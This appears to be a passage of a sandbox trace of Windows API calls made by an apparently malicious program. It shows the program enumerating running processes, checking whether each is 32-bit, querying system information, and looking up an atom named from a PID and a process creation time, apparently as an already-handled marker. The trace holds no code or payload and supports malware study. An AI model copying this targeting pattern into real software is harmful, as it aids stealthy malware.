	[0074.236] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.236] CloseHandle (hObject=0x224) returned 1
	[0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.237] CloseHandle (hObject=0x224) returned 1
	[0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.237] CloseHandle (hObject=0x224) returned 1
	[0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.237] CloseHandle (hObject=0x224) returned 1
	[0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.237] CloseHandle (hObject=0x224) returned 1
	[0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.237] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.237] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.238] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.238] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.238] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.238] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.238] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.238] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.238] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.238] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e680, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.238] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.238] CloseHandle (hObject=0x224) returned 1
	[0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb30, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.239] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.239] CloseHandle (hObject=0x224) returned 1
	[0074.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.239] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.240] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.240] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.240] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.241] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetLastError () returned 0x5
	[0074.242] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.242] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.242] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.242] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.242] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.242] CloseHandle (hObject=0x224) returned 1
	[0074.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.243] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.243] CloseHandle (hObject=0x224) returned 1
	[0074.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e770, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.243] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.243] CloseHandle (hObject=0x224) returned 1
	[0074.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.286] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.290] CloseHandle (hObject=0x224) returned 1
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.291] CloseHandle (hObject=0x224) returned 1
	[0074.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.291] CloseHandle (hObject=0x224) returned 1
	[0074.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.291] CloseHandle (hObject=0x224) returned 1
	[0074.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.291] CloseHandle (hObject=0x224) returned 1
